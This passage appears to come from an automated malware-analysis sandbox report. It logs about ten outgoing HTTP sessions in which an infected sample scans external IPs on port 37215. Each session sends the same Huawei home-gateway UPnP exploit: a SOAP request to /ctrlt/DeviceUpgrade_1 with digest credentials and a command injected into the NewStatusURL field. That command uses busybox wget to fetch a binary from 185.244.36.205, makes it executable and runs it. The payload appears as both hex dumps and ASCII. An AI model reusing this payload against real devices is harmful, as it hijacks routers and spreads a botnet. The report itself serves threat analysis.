                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1206192.168.2.1553606181.154.194.3937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396190882 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1207192.168.2.154164294.182.21.12537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396210909 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1208192.168.2.1560556181.183.176.20837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396224976 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1209192.168.2.1538564157.169.84.19637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396255016 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1210192.168.2.1556546156.54.42.3437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396305084 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1211192.168.2.1539192121.188.52.21537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396321058 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1212192.168.2.1545098102.9.15.7237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396322966 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1213192.168.2.153316631.150.188.18937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396322966 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1214192.168.2.1545266222.96.55.20537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396326065 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1215192.168.2.1539700222.234.13.17737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396337032 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
